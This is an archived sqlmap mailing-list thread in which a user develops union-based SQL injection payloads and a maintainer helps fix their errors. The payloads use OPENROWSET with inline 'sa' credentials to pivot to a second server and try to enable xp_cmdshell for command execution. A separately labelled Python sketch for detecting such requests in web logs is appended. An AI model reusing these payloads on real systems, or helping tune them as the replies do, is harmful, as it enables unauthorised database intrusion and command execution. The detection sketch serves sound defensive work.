Hi Adi.
I think that that is really the proper way to "escape" the single quote
in MsSQL
(http://stackoverflow.com/questions/1586560/how-do-i-escape-a-single-quote-in-sqlserver)
and you can't use any CHAR() escaping directly inside the OPENROWSET (there
are some ways to do it via EXEC:
http://social.msdn.microsoft.com/forums/en-US/transactsql/thread/0f78e033-53a4-4404-a190-9e3b269874ec
<- you can use CHAR() escaping there, but I really do believe that this
is unnecessary in your case).
So, I would suggest that you continue playing around a bit (e.g. with other
extended stored procedures
(http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm) to see if the
problem persists).
Kind regards,
Miroslav Stampar
On Thu, Jun 21, 2012 at 1:12 PM, Adi Mutu <adi_mut...@yahoo.com> wrote:
> -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', (
> select * from
> OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','
> select @@version; master..sp_configure ''xp_cmdshell'',1
> ')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
>
> the problem is with the query:
>
> select @@version; master..sp_configure ''xp_cmdshell'',1
> Any possibility to give the string from ascii codes as in mysql?
>
> ------------------------------
> *From:* Miroslav Stampar <miroslav.stam...@gmail.com>
> *To:* Adi Mutu <adi_mut...@yahoo.com>
> *Cc:* "sqlmap-users@lists.sourceforge.net" <
> sqlmap-users@lists.sourceforge.net>
> *Sent:* Thursday, June 21, 2012 2:01 PM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> It all depends on context. You'll need to send a sample that you want to
> run. Quotes are not interpreted/parsed everywhere the same.
>
> Kind regards
>
> On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>
> My feeling is that
> "[OLE/DB provider returned message: Deferred prepare could not be
> completed." is because of an SQL error :) so my fault.
>
> And regarding the second error, I think you must always return some
> columns in the query, such as select @@version.
>
> Now the question is: how do I embed a string inside another string delimited
> with quotes? It looks like double quotes are not working... doubling the
> quote '' does not always seem to work...
>
> ------------------------------
> *From:* Adi Mutu <adi_mut...@yahoo.com>
> *To:* Miroslav Stampar <miroslav.stam...@gmail.com>
> *Cc:* "sqlmap-users@lists.sourceforge.net" <
> sqlmap-users@lists.sourceforge.net>
> *Sent:* Thursday, June 21, 2012 11:45 AM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> tried, same stuff.
> I've tried to reenable xp_cmdshell first with
>
> master..sp_configure 'show advanced options',1
> reconfigure
> master..sp_configure 'xp_cmdshell',1
> reconfigure
>
> and got the same error: [OLE/DB provider returned message: Deferred
> prepare could not be completed.]
>
> then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '
> and got error:
>
> OLE DB error trace [Non-interface error: OLE DB provider unable to process
> object, since the object has no columnsProviderName='SQLOLEDB', Query=exec
> sp_addextendedproc "xp_cmdshell","xp_log70.dll" '].
>
>
> ------------------------------
> *From:* Miroslav Stampar <miroslav.stam...@gmail.com>
> *To:* Adi Mutu <adi_mut...@yahoo.com>
> *Cc:* "sqlmap-users@lists.sourceforge.net" <
> sqlmap-users@lists.sourceforge.net>
> *Sent:* Thursday, June 21, 2012 11:26 AM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> Try with master..resultabcd
>
> I forgot to mention that there need to be two dots (or the schema name in
> between) between the db name and the table name in MSSQL.
>
> On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>
> Hi Miroslav,
>
> got db_name master and tried with master.resultabcd but i get the same
> error.
>
> Kind Regards,
> A.
>
> ------------------------------
> *From:* Miroslav Stampar <miroslav.stam...@gmail.com>
> *To:* Adi Mutu <adi_mut...@yahoo.com>
> *Cc:* "sqlmap-users@lists.sourceforge.net" <
> sqlmap-users@lists.sourceforge.net>
> *Sent:* Thursday, June 21, 2012 11:11 AM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> Hi Adi.
>
> You could try prepending the database name to the resultbcd. It seems that
> in case of linked server(s) doing that fixes the mentioned problem
> (Reference:
> http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466
> )
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>
> I'm having an injection like this:
> openrowset in a union (I've managed to do a SELECT @@version on
> 192.168.1.4)
>
> -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', (
> select * from
> OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select
> output from resultbcd')),'aaa','15','16','17','18','19','20','21' from
> teachers7 where id=808
>
> and when I try to select from resultabcd I get:
> [OLE/DB provider returned message: Deferred prepare could not be
> completed.]
>
> I could not find a good answer with Google. Thanks.
>
> Kind regards,
> A.
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
--
Miroslav Stampar
http://about.me/stamparm
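
A defender-side sketch of how requests shaped like the ones quoted in this thread (ad hoc OPENROWSET with inline credentials, sp_configure on xp_cmdshell, sp_addextendedproc) could be flagged in web-server logs. This is an added example, not code from the thread or from sqlmap; the log lines, addresses, rule names and the /list.asp path are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the thread); addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 "GET /list.asp?id=808 HTTP/1.1" 200',
    '198.51.100.9 "GET /list.asp?id=-1+union+all+select+%271%27,(select+*+from+'
    'OPENROWSET(%27SQLOLEDB%27,%27uid=sa;pwd=EXAMPLE;Address=192.0.2.10%27,'
    '%27select+@@version%27)) HTTP/1.1" 500',
    # Same shape, double URL-encoded, carrying the nested doubled-quote statement.
    '198.51.100.9 "GET /list.asp?id=-1+union+all+select+%25271%2527,(select+*+from+'
    'openrowset(%2527SQLOLEDB%2527,%2527uid=sa;pwd=EXAMPLE;Address=192.0.2.10%2527,'
    '%2527select+@@version;+master..sp_configure+%2527%2527xp_cmdshell%2527%2527,1'
    '%2527)) HTTP/1.1" 500',
]

# Rule names are hypothetical labels chosen for this example.
RULES = {
    "openrowset_adhoc": re.compile(r"\bopenrowset\s*\(", re.I),
    "inline_credentials": re.compile(r"\buid\s*=\s*[^;']+;\s*pwd\s*=", re.I),
    "xp_cmdshell_reconfig": re.compile(r"\bsp_configure\b.*\bxp_cmdshell\b", re.I | re.S),
    "extended_proc_registration": re.compile(r"\bsp_addextendedproc\b", re.I),
}


def normalize(raw):
    """URL-decode up to three times (catches double encoding) and collapse whitespace."""
    prev, cur = None, raw
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote_plus(cur)
    return re.sub(r"\s+", " ", cur)


def scan(lines):
    """Return (line_number, sorted rule names) for every line that trips a rule."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        text = normalize(line)
        hits = sorted(name for name, rx in RULES.items() if rx.search(text))
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

Doubled quotes do not hide the keywords from these rules, because the match is on the decoded procedure and function names rather than on the quoting around them.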